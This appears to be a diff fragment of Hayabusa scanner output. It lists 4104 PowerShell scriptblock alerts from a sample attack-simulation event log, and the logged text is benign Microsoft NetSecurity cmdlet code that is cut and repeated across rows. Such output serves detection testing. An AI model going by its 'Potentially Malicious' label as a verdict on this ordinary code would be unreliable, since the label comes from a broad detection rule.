[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [Validate",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [Validate",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"NotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 